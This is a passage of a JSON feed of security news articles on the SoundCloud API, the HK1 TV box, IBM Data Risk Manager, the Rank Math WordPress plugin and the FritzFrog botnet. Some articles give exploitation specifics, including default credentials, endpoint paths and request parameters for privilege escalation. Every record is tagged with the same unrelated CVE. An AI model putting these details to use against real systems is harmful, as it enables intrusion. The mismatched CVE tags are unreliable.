webinar](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-10-29T23:15:17", "type": "threatpost", "title": "NVIDIA Patches Critical Bug in High-Performance Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-10-29T23:15:17", "id": "THREATPOST:AF18435BD7544B43152D5D3E8B97CE30", "href": "https://threatpost.com/nvidia-critical-bug-hpc/160762/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:30:31", "description": "Online music platform SoundCloud, which can be thought of as an audio-based YouTube for music creators, has addressed several security bugs in its APIs that could lead to denial-of-service (DoS) or account takeover via credential-stuffing.\n\nSoundCloud recently [sold a $75 million stake](<https://techcrunch.com/2020/02/11/music-streaming-pioneer-soundcloud-raises-75m-from-pandora-owner-siriusxm/>) to satellite radio giant SiriusXM and the two also inked a lucrative ad deal. SoundCloud claims to host 200 million different music tracks on its online platform.\n\nAccording to researcher Paulo Silva of Checkmarx Security Research, three different groups of security vulnerabilities were found in the platform: A authentication issue which could lead to account takeover; a rate-limiting bug that could lead to DoS; and an improper input validation.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe broken authentication issue has to do with not having a set number of login tries before locking someone out of the account \u2013 which opens the door to unlimited brute-force attacks from cybercriminals trying to guess passwords.\n\n\u201cThe /sign-in/password endpoint of api-v2.soundcloud.com does not implement proper account lockout based on failed authentication attempts,\u201d according to Silva, in [an analysis](<https://www.checkmarx.com/blog/checkmarx-research-soundcloud-api-security-advisory>) posted Tuesday. \u201cIt solely relies on rate limiting which can be evaded using several combinations of use_agent, device_id and signature.\u201d\n\nThat means that credential stuffing \u2014 the automated process of verifying that breached pairs of usernames and passwords work for not only the services that they originated from, but also other services \u2014 could have become a real issue. Digital Shadows [recently pointed out](<https://threatpost.com/password-breaches-fueling-booming-credential-stuffing-business/125900/>) that the market for credential stuffing software and services is thriving thanks in large part to an epidemic of breaches of usernames and passwords.\n\nCheckmarx also found a related user enumeration weakness that could be used to verify valid user account IDs as well, making it even easier to hack accounts. An attacker can exploit this to guess account names and then probe whether or not they actually exist.\n\n\u201cBoth /sign-in/identifier and /users/password_reset endpoints of api-v2.soundcloud.com can be used to enumerate user accounts,\u201d explained the firm. \u201cIn both cases, the endpoints provide different responses depending on whether the requested user account identifier exists or not.\u201d\n\nThe rate-limiting issue meanwhile has to do with SoundCloud not limiting how many song results can be retrieved in certain searchers.\n\nFor instance, the /me/play-history/tracks API endpoint, which allows users to view recently played songs, doesn\u2019t enforce rate limiting. Thus, an attacker can send a large number of POST requests from a single machine/IP address, or can use a high-volume GET request to return hundreds of tracks at once. This can not only potentially overwhelm the API if several of these are sent at the same time, but it could also be used to artificially inflate the statistics for demand for certain tracks or artists.\n\n\u201cThe lack of rate limiting may compromise the system availability, making it vulnerable to DoS attacks,\u201d according to Checkmarx. \u201cFrom a business perspective, not limiting the amount of requests to this endpoint may compromise the data integrity, since it may create biased tracks-statistics.\u201d\n\nA related issue has to do with the /tracks endpoint of api-v2.soundcloud.com, which Silva said does not implement proper resources limiting \u2013 also potentially leading to DoS.\n\n\u201cSince no validation is performed regarding the number of tracks IDs in the ids list, it is possible to manipulate the list to retrieve an arbitrary number of tracks in a single request,\u201d he said, adding that in testing, researchers were able to retrieve up to 689 tracks in a single request.\n\n\u201cUsing a specially crafted list of track IDs to maximize the response size, and issuing requests from several sources at the same time to deplete resources in the application layer, will make the target\u2019s system services unavailable,\u201d Silva explained.\n\nThe improper input validation issue meanwhile would allow the attacker to use extra-long character strings when filling in the description, title and genre forms while uploading songs, according to the research. An exploit could make use of this to carry out cross-site scripting attacks or SQL injection.\n\n\u201cThe /tracks/{track_urn} endpoint of api-v2.soundcloud.com does not properly validate and enforce the length of [these] properties,\u201d Silva explained. \u201cIssuing requests directly to the API server puts the attacker in control of an additional 61960 bytes (total of 66160 bytes).\u201d\n\nFor its part, SoundCloud promptly fixed the problem and sent out a statement: \u201cAt SoundCloud, the security of our users\u2019 accounts is extremely important to us. We are always looking for ways to enhance the security of our platform for our users. We appreciate Checkmarx reaching out to discuss their findings.\u201d\n\n**Learn how Operational Technology and Information Technology systems are merging and changing security playbooks in this free Threatpost Webinar. Join us **[**Wednesday, Feb. 19 at 2 p.m. ET**](<https://attendee.gotowebinar.com/register/2652328115100076035?source=art>)** when a panel of OT and IT security experts will discuss how this growing trend is shaping security approaches for IoT and 5G rollouts. This webinar is for security and DevOps engineers, IoT edge developers and security executives.**\n", "cvss3": {}, "published": "2020-02-12T18:48:59", "type": "threatpost", "title": "SoundCloud Tackles DoS, Account Takeover Issues", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-02-12T18:48:59", "id": "THREATPOST:4A02969D23A7147DEF39EFDE11D3094E", "href": "https://threatpost.com/soundcloud-dos-account-takeover/152838/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:07:48", "description": "A critical bug in the Hindotech HK1 TV Box would allow root-privilege escalation thanks to improper access control. A successful exploit would allow attackers to steal social-networking account tokens, Wi-Fi passwords, cookies, saved passwords, user-location data, message history, emails, contacts and more, researchers said.\n\nThe bug, which is awaiting a CVE assignment, comes in at 9.3 out of 10 on the [CvSS severity scale](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H&version=3.1>), according to researchers at Sick.Codes, a security resource for developers.\n\nThe HK1 Box S905X3 TV Box is an Android-based streaming box that plugs into a TV and allows users to access YouTube, Netflix and other streaming content \u201cover-the-top,\u201d i.e., without a cable subscription. Users can also sign into their favorite email, music and social-networking-related apps for a full \u201csmart TV\u201d experience. It retails for under $100.\n\n[![Threatpost Webinar Promo Retail Security](https://media.threatpost.com/wp-content/uploads/sites/103/2020/10/07103433/webinar-promo-retail-security-1.jpg)](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\nThe vulnerability would allow a local, unprivileged user to escalate to root, the Sick.Codes team said [in a posting](<https://sick.codes/sick-2020-004/>) this week. At issue is a lack of authentication when it comes to the debugging functions of the set-top \u2013 specifically, when connected to the device through the serial port (UART), or while using the [Android Debug Bridge](<https://developer.android.com/studio/command-line/adb>) (adb), as an unprivileged user.\n\nadb is a versatile command-line tool that lets users communicate with a device. It facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that can be used to run a variety of commands on a device.\n\n\u201cA local attacker using adb, or a physical attacker connecting to the device through the UART serial debugging port, is dropped into a shell as the \u2018shell\u2019 user without entering a username or password,\u201d researchers explained. \u201cOnce logged in as the \u2018shell\u2019 user, the attacker can escalate to root using the /sbin/su binary which is group executable (750), or /system/xbin/su which is executable by all users (755).\u201d\n\nOnce endowed with root privileges, the attacker can view any of the information for the apps the user is signed into \u2013 paving the way for stealing access tokens, passwords, contacts and messages and more. Attackers could also use the HK1 Box maliciously to sniff other devices on the same network, usually in a home-networking environment, according to the analysis.\n\n\u201cFor example, once root, the network Wi-Fi password can be read in plain text at /data/misc/wifi/WifiConfigStore.xml,\u201d researchers explained.\n\nThus far, the issue has not been addressed.\n\nThe vendor for the device is the Shenzhen Hindo Technology Co.,Ltd., based just outside of Hong Kong. The researchers were unable to contact the company (and its website, [www.hindotech.com](<http://www.hindotech.com>), was down as of the time of writing). Instead, the researchers submitted a draft advisory to Amlogic, which shares branding with the device in the States \u2013 and received no response.\n\nThreatpost has tried to contact Shenzhen Hindo but has been unsuccessful in reaching the company.\n\nThis is only the latest entertainment-related security bug. Last week, researchers disclosed the [\u2018WarezTheRemote\u2019 attack](<https://threatpost.com/comcast-tv-remote-homes-snooping/159899/>), affecting Comcast\u2019s XR11 voice remote control. A security flaw would allow attackers to remotely snoop in on victims\u2019 private conversations.\n\nThe flaw stems from Comcast\u2019s XR11, a popular voice-activated remote control for cable TV, which has more than 18 million units deployed across the U.S. The remote enables users to say the channel or content they want to watch rather than keying in the channel number or typing to search.\n\n[**On October 14 at 2 PM ET**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** Get the latest information on the rising threats to retail e-commerce security and how to stop them. **[**Register today**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** for this FREE Threatpost webinar, \u201c**[**Retail Security: Magecart and the Rise of e-Commerce Threats.**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this **[**LIVE **](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**webinar.**\n", "cvss3": {}, "published": "2020-10-13T16:36:15", "type": "threatpost", "title": "Authentication Bug Opens Android Smart-TV Box to Data Theft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-10-13T16:36:15", "id": "THREATPOST:DFC75A06F449D25EF03338C5D80C705C", "href": "https://threatpost.com/authentication-bug-android-smart-tv-data-theft/160025/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:26:14", "description": "UPDATED\n\nFour serious security vulnerabilities in the IBM Data Risk Manager (IDRM) have been identified that can lead to unauthenticated remote code execution (RCE) as root in vulnerable versions, according to analysis \u2013 and a proof-of-concept exploit is available.\n\nIBM weighed in on the problem this week, after a researcher went public with the bugs, one of which may end up being a zero-day issue \u2014 Big Blue is still investigating.\n\nIDRM is a software platform that aggregates threat data from disparate security systems, in order to perform enterprise security risk analysis. According to security researcher Pedro Ribeiro from Agile Information Security, older versions (v. 2.0.1 to 2.0.3) of the IDRM Linux virtual appliance contains bugs pertaining to authentication bypass; command injection; insecure default password; and arbitrary file download. The first three can be chained together to achieve RCE in vulnerable versions.[![](https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/16215737/Divycloud_225x188.jpg)](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)\n\n\u201cIDRM is an enterprise security product that handles very sensitive information,\u201d Ribeiro wrote in a [Tuesday analysis](<https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md>). \u201cThe hacking of an IDRM appliance might lead to a full-scale company compromise, as it stores credentials to access other security tools, not to mention it contains information about critical vulnerabilities that affect the company.\u201d\n\n**Three Chained Bugs for RCE**\n\nThe first three bugs that Ribeiro found can be combined to allow a remote attacker to gain full system compromise, according to the research.\n\nThe first is as-yet unaddressed by IBM: An authentication-bypass issue that exists in the appliance\u2019s API endpoint, /albatross/user/login. This endpoint is authenticated by a method that takes the username and sessionID credentials of the person trying to log in, and checks if username exists in the database and if the sessionId is associated with that username. If it all checks out, the application returns a newly generated random password for that username. However, Ribeiro demonstrated that a remote attacker can send a specially crafted request that subverts this process and allows an attacker to retrieve a valid Bearer administrative token. That can then be used to access various APIs.\n\n\u201cIt\u2019s also possible to login as a normal web user on the /albatross/login endpoint, which will yield an authenticated cookie instead of a token, allowing access to the web administration console,\u201d explained the researcher. \u201cIn any case\u2026authentication is now completely bypassed and we have full administrative access to IDRM.\u201d\n\nThe command-injection bug, which has a patch, meanwhile exists because the IDRM exposes an API at /albatross/restAPI/v2/nmap/run/scan that allows an authenticated user to perform nmap scans.\n\n\u201cHaving access to nmap allows running arbitrary commands, if we can upload a script file and then pass that as an argument to nmap with \u2013script=<FILE>,\u201d the researcher explained. \u201cHowever, to achieve code execution in this way, we still need to upload a file. Luckily, there is a method that processes patch files and accepts arbitrary file data, saving it to /home/a3user/agile3/patches/<FILE>.\u201d\n\nThat method is supposed to accept a patch file, process it and apply it. However, Ribeiro explained that \u201cthere are several bugs in version 2.0.2 that cause the method to abort early and fail to process the file. Still, the file is uploaded and kept on disk even after the method aborts.\u201d\n\nIn order to exploit this bug, an attacker would need to have an authenticated session as an administrator, which can be achieved with the first vulnerability.\n\nThe third bug, which IBM says can be solved by reconfiguring the appliance, comes from the use of hard-coded credentials: The administrative user in the IDRM virtual appliance is \u201ca3user\u201d by default.\n\n\u201cThis user is allowed to login via SSH and run sudo commands, and it is set up with a default password of \u2018idrm,'\u201d said Ribeiro.\n\nAnd, when combined with the first two bugs, this allows an unauthenticated attacker to achieve RCE as root on the IDRM virtual appliance, leading to complete system compromise, the researcher said.\n\nA Metasploit [proof-of-concept exploit module](<https://github.com/rapid7/metasploit-framework/pull/13300>) implementing the full RCE chain has been released and a video demonstration can be [found here](<https://asciinema.org/a/3nJ4lD1pD7XBfEFqkc9qPDUV2>).\n\n**Arbitrary File Download**\n\nThe fourth bug, also fixed in later versions, is a path traversal bug that comes from an improper limitation of a pathname to a restricted directory.\n\n\u201cIDRM exposes an API at /albatross/eurekaservice/fetchLogFiles that allows an authenticated user to download log files from the system,\u201d explained Ribeiro. \u201cHowever, the logFileNameList parameter contains a basic directory traversal flaw that allows an attacker to download any file off the system.\u201d\n\nHe added that exploitation is \u201cvery simple.\u201d\n\nThis flaw too can be chained. When combined with the first authentication-bypass bug, an unauthenticated attacker can download any file readable by \u201ca3user\u201d off the system, Ribeiro said. A [second Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/13301>) implementing this was released and a video demo [can be found here](<https://asciinema.org/a/y6HfoaEIf8qZbn6mcUGeVhyUp>).\n\n**Patch Information and Mitigation**\n\nVersions 2.0.1 to 2.0.3 have been confirmed as vulnerable to the first three flaws, according to Ribeiro; as for the fourth issue, version 2.0.1 is not vulnerable, but v. 2.0.2 and 2.0.3 are. According to [IBM\u2019s advisory](<https://www.ibm.com/support/pages/node/6195705>), issued on April 22 after Ribeiro disclosed his findings, the command-injection vulnerability and the arbitrary-file download bug were both fixed in version 2.0.4. IBM also said that the default-password issue is a configuration choice and up to administrators to change ([guidance available here](<https://www.ibm.com/support/knowledgecenter/en/SSJQ6V_2.0.6/com.ibm.idrm.doc/install/tsk/tsk_installguide_idrm_configuration.html>)).\n\nAs for the first vulnerability, the authentication bypass, IBM said in the advisory that it is \u201cinvestigating this report and will provide further information on fix action as appropriate.\u201d\n\nThe current version of the IDRM is v. 2.0.6.\n\nInitially, Ribeiro made an attempt to coordinate disclosure with IBM via CERT/CC, but IBM did not accept the vulnerability report for review:\n\n_\u201cWe have assessed this report and closed as being out of scope for our vulnerability disclosure program since this product is only for \u2018enhanced\u2019 support paid for by our customers,\u201d according to Big Blue\u2019s response to CERT/CC. \u201cThis is outlined in our policy https://hackerone.com/ibm. To be eligible to participate in this program, you must not be under contract to perform security testing for IBM Corporation, or an IBM subsidiary, or IBM client within six months prior to submitting a report.\u201d_\n\nHowever, after Ribeiro made his findings public, Big Blue said the rejection was a mistake.\n\n\u201cA process error resulted in an improper response to the researcher who reported this situation to IBM,\u201d a spokesperson told Threatpost on Tuesday. \u201cWe have been working on mitigation steps and they will be discussed in a security advisory to be issued.\u201d\n\n_This article was updated at 4 p.m. ET on Tuesday, April 21 with a statement from IBM, and at 10 a.m. ET on Wednesday, April 22 with fresh advisory information from IBM._\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-21T18:19:01", "type": "threatpost", "title": "RCE Exploit Released for IBM Data Risk Manager", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-21T18:19:01", "id": "THREATPOST:C9AB0B1EBE1A344DC385414BD784DFC7", "href": "https://threatpost.com/rce-exploit-ibm-data-risk-manager-no-patch/154986/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:26:52", "description": "A pair of security vulnerabilities in the WordPress search engine optimization (SEO) plugin, known as Rank Math, could allow remote cybercriminals to elevate privileges and install malicious redirects onto a target site, according to researchers. It\u2019s a WordPress plugin with more than 200,000 installations.\n\nAccording to researchers with Wordfence, one of the flaws is critical (10 out of 10 on the CVSSv3 vulnerability severity scale). It could allow an unauthenticated attacker to update arbitrary metadata. This can be abused to grant or revoke administrative privileges for any registered user on the site.\n\nThe second vulnerability is characterized as high-severity (7.4 on the severity scale) and could enable an unauthenticated attacker to create redirects from almost any location on the site to any destination of their choice.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nWordfence disclosed the bugs to the developer of the add-on on March 24 (its full name is \u201cWordPress SEO Plugin \u2013 Rank Math\u201d) \u2013 and CVE tracking numbers are forthcoming, researchers said, [in an analysis](<https://www.wordfence.com/blog/2020/03/critical-vulnerabilities-affecting-over-200000-sites-patched-in-rank-math-seo-plugin/>) released Tuesday. A patch is now available in the latest version, 1.0.41.1, so Web administrators should update their sites.\n\n**Critical Metadata Flaw**\n\nRank Math allows users to update the metadata on website posts \u2013 which is where the bug lies, according to a technical analysis published on Tuesday by Wordfence.\n\nThe plugin registers a REST-API endpoint, rankmath/v1/updateMeta, the firm explained in its breakdown. This calls a function called \u201cupdate_metadata,\u201d which could be used to update the slug on existing posts, or could be used to delete or update metadata for posts, comments and terms. This endpoint also allows for updating metadata for users.\n\nThe issue is that in non-patched versions, the endpoint fails to include a permissions check on users making changes.\n\n\u201cWordPress user permissions are stored in the usermeta table, which meant that an unauthenticated attacker could grant any registered user administrative privileges by sending a $_POST request to wp-json/rankmath/v1/updateMeta, with an objectID parameter set to the User ID to be modified, an objectType parameter set to user, a meta[wp_user_level] parameter set to 10, and a meta[wp_capabilities][administrator] parameter set to 1,\u201d the analysis noted.\n\nA nefarious type could also completely revoke an existing administrator\u2019s privileges by sending a similar request with a meta[wp_user_level] parameter and a meta[wp_capabilities] parameter set to empty values, the researchers added, effectively locking administrators out of their own sites.\n\n\u201cNote that these attacks are only the most critical possibilities. Depending on the other plugins installed on a site, the ability to update post, term and comment metadata could potentially be used for many other exploits such as cross-site scripting (XSS),\u201d the researchers commented.\n\n**Malicious Redirect Bonanza**\n\nThe Rank Math plugin also comes with an optional module that can be used to create redirects on a site. An administrator might do this to direct visitors away from pages under construction, for example.\n\nIn order to add this feature, the plugin registers a REST-API endpoint for this too, called \u201crankmath/v1/updateRedirection.\u201d And, like the other vulnerability, this endpoint fails to execute a permissions check, according to Wordfence \u2013 which means that an attacker could easily create new redirects or modify existing redirects. As such, the attack could essentially be used to prevent access to almost all of a site\u2019s existing content, according to the analysis, by simply redirecting visitors to a malicious site.\n\n\u201cIn order to perform this attack, an unauthenticated attacker could send a $_POST request to rankmath/v1/updateRedirection with a redirectionUrl parameter set to the location they wanted the redirect to go to, a redirectionSources parameter set to the location to redirect from, and a hasRedirect parameter set to true,\u201d Wordfence researchers wrote.\n\nThere is, however, a caveat that accounts for the lower-severity rating of the bug: \u201cThe redirect could not be set to an existing file or folder on the server, including the site\u2019s main page,\u201d according to the analysis. \u201cThis limited the damage to some extent in that, while an attacker could create a redirect from most locations on the site, including new locations, or any existing post or page other than the homepage, they could not redirect visitors immediately upon accessing the site.\u201d\n\nWeb admins can mitigate the issues by building in a \u201cpermission_callback\u201d on any REST-API endpoints, or by updating to the latest version of the plug-in.\n\nWordPress plugins continue to make headlines as weak links that can lead to website compromises. For instance, in March, a critical vulnerability in a WordPress plugin known as \u201cThemeREX Addons\u201d [was found](<https://threatpost.com/themerex-wordpress-plugin-remote-code-execution/153592/>) that could open the door for remote code execution in 44,000 websites.\n\nAlso in March, two vulnerabilities \u2013 including a high-severity flaw \u2013 [were patched](<https://threatpost.com/wordpress-plugin-bug-popup-builder/153715/>) in a popular WordPress plugin called Popup Builder. The more severe flaw could enable an unauthenticated attacker to infect malicious JavaScript into a popup \u2013 potentially opening up more than 100,000 websites to takeover.\n\nIn February, popular WordPress plugin Duplicator, which has more than 1 million active installations, [was discovered to have](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) an unauthenticated arbitrary file download vulnerability that was being attacked. And, earlier that month, a critical flaw in a popular WordPress plugin that helps make websites compliant with the General Data Protection Regulation (GDPR) [was disclosed](<https://threatpost.com/critical-wordpress-plugin-bug-afflicts-700k-sites/152871/>); it could enable attackers to modify content or inject malicious JavaScript code into victim websites. It affected 700,000 sites.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2020/03/24173101/DUO_320x50.jpg)](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "cvss3": {}, "published": "2020-04-01T18:03:01", "type": "threatpost", "title": "Critical WordPress Plugin Bug Can Lock Admins Out of Websites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-01T18:03:01", "id": "THREATPOST:1973BA4B294E79D107940CF5DA67CB9A", "href": "https://threatpost.com/critical-wordpress-plugin-bug-lock-admins-out/154354/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:21:31", "description": "A peer-to-peer (P2) botnet called FritzFrog has hopped onto the scene, and researchers said it has been actively breaching SSH servers since January.\n\nSSH servers are pieces of software found in routers and IoT devices, among other machines, and they use the secure shell protocol to accept connections from remote computers. SSH servers are common in enterprise and consumer environments alike.\n\nAccording to an analysis from Guardicore Labs, FritzFrog propagates as a worm, brute-forcing credentials at entities like governmental offices, educational institutions, medical centers, banks and telecom companies. FritzFrog has attempted to compromise tens of millions of machines so far, and has successfully breached more than 500 servers in total, Guardicore researcher Ophir Harpaz said. Victims include well-known universities in the U.S. and Europe, and a railway company; and the most-infected countries are China, South Korea and the U.S.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>) \n\u201cFritzFrog executes a worm malware which is written in Golang, and is modular, multi-threaded and fileless, leaving no trace on the infected machine\u2019s disk,\u201d Harpaz explained, [in a posting](<https://www.guardicore.com/2020/08/fritzfrog-p2p-botnet-infects-ssh-servers/>) on Wednesday. Once the server is compromised, \u201cthe malware creates a backdoor in the form of an SSH public key, enabling the attackers ongoing access to victim machines.\u201d\n\nIt also can drop additional payloads, such as cryptominers.\n\n## **Swimming in a Unique Pond**\n\nFritzFrog is a P2P botnet, meaning that it has greater resiliency than other types of botnets because control is decentralized and spread among all nodes; as such, there\u2019s no single point-of-failure and no command-and-control server (C2).\n\n\u201cFritzFrog is completely proprietary; its P2P implementation was written from scratch, teaching us that the attackers are highly professional software developers,\u201d Harpaz said. She added, \u201cThe P2P protocol is completely proprietary, relying on no known P2P protocols such as \u03bcTP.\u201d\n\nAs far as the other technical details go, Guardicore analyzed the botnet by injecting its own nodes into the mix, giving researchers the ability to participate in the ongoing P2P traffic and see how it was built.\n\nThey discovered that almost everything about FritzFrog is unique when compared with past P2P botnets: Harpaz noted that it doesn\u2019t use IRC like IRCflu; it operates in-memory unlike another [cryptomining botnet, DDG](<https://threatpost.com/p2p-ddg-botnet-unstoppable/154650/>); and runs on Unix-based machines unlike others like the InterPlanetary Storm botnet.\n\nAdditionally, its fileless payload is unusual. Harpaz wrote that files are shared over the network to both infect new machines and run new malicious payloads on compromised ones \u2013 and that this is accomplished completely in-memory using blobs.\n\n\u201cWhen a node A wishes to receive a file from its peer, node B, it can query node B which blobs it owns using the command getblobstats,\u201d according to the researcher. \u201cThen, node A can get a specific blob by its hash, either by the P2P command getbin or over HTTP, with the URL http://:1234/. When node A has all the needed blobs \u2013 it assembles the file using a special module named Assemble and runs it.\u201d\n\nOne the malware is installed on a target by this method, it begins listening on port 1234, waiting for initial commands that will sync the victim with a database of network peers and brute-force targets. Once this initial syncing is finished, FritzFrog gets creative on the evasion-detection front when it comes to further communication from outside the botnet: \u201cInstead of sending commands directly over port 1234, the attacker connects to the victim over SSH and runs a netcat client on the victim\u2019s machine,\u201d according to the analysis. \u201cFrom this point on, any command sent over SSH will be used as netcat\u2019s input, thus transmitted to the malware.\u201d\n\nMeanwhile, the botnet constantly updates itself with databases of targets and breached machines as it worms through the internet.\n\n\u201cNodes in the FritzFrog network keep in close contact with each other,\u201d Harpaz noted. \u201cThey constantly ping each other to verify connectivity, exchange peers and targets and keep each other synced. The nodes participate in a clever vote-casting process, which appears to affect the distribution of brute-force targets across the network. Guardicore Labs observed that targets are evenly distributed, such that no two nodes in the network attempt to \u2018crack\u2019 the same target machine.\u201d\n\nFurther, it was built with an extensive dictionary of breached names and passwords for brute-forcing purposes, making it highly aggressive (\u201cBy comparison, DDG, a recently discovered P2P botnet, used only the username \u2018root,'\u201d said Harpaz).\n\nThe malware also spawns multiple threads to perform various tasks simultaneously. For instance, an IP address in the target queue will be fed to a Cracker module, which in turn will scan the machine attached to the IP address and try to brute-force it; a machine which was successfully breached is queued for malware infection by the DeployMgmt module; and a machine which was successfully infected will be added to the P2P network by the Owned module.\n\nIn the event of a reboot of the compromised system, the malware leaves a backdoor behind, whose login credentials are saved by the network peers.\n\n\u201cThe malware adds a public SSH-RSA key to the authorized_keys file,\u201d according to the research. \u201cThis simple backdoor allows the attackers \u2013 who own the secret private key \u2013 for passwordless authentication, in case the original password was modified.\u201d\n\nThe malware also monitors the file system state on infected machines, periodically checking for available RAM, uptime, SSH logins and CPU-usage statistics. Other nodes take this information and uses it to determine whether to run a cryptominer or not.\n\nIf it decides to run a cryptominer, the malware runs a separate process called \u201clibexec\u201d to mine the Monero cryptocurrency with an XMRig spinoff. Though this secondary infection is what the botnet has so far been used for, its architecture means that it could also install any other type of malware on infected nodes, should its authors decide to do so.\n\nIn all, FritzFrog is highly advanced, Harpaz said, but there\u2019s a simple way to ward off a compromise: \u201cWeak passwords are the immediate enabler of FritzFrog\u2019s attacks,\u201d she said. \u201cWe recommend choosing strong passwords and using public key authentication, which is much safer.\u201d\n\nAdmins should also remove FritzFrog\u2019s public key from the authorized_keys file, preventing the attackers from accessing the machine, she said. And, \u201crouters and IoT devices often expose SSH and are thus vulnerable to FritzFrog; consider changing their SSH port or completely disabling SSH access to them if the service is not in use.\u201d\n\n_It\u2019s the age of remote working, and businesses are facing new and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary _[_Threatpost eBook_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)**_, 2020 in Security: Four Stories from the New Threat Landscape_**_, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. _[_Click here to download our eBook now_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)_._\n", "cvss3": {}, "published": "2020-08-19T20:46:31", "type": "threatpost", "title": "FritzFrog Botnet Attacks Millions of SSH Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-08-19T20:46:31", "id": "THREATPOST:639CADC540E81321048EB418C2EC7586", "href": "https://threatpost.com/fritzfrog-botnet-millions-ssh-servers/158489/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:27:42", "description": "A critical vulnerability in a WordPress plugin known as \u201cThemeREX Addons\u201d could open the door for remote code execution in tens of thousands of websites. According to Wordfence, the bug has been actively exploited in the wild as a zero-day.\n\nThe plugin, which is installed on approximately 44,000 sites, is used to apply various \u201cskins\u201d that govern the look and feel of web destinations, including theme-enhancing features and widgets.\n\nTo provide compatibility with WordPress\u2019 Gutenberg plugin, the ThemeREX Addons plugin uses an API, according to Wordfence researcher Chloe Chamberland, writing in [a blog posting](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) on Monday. When the API interacts with 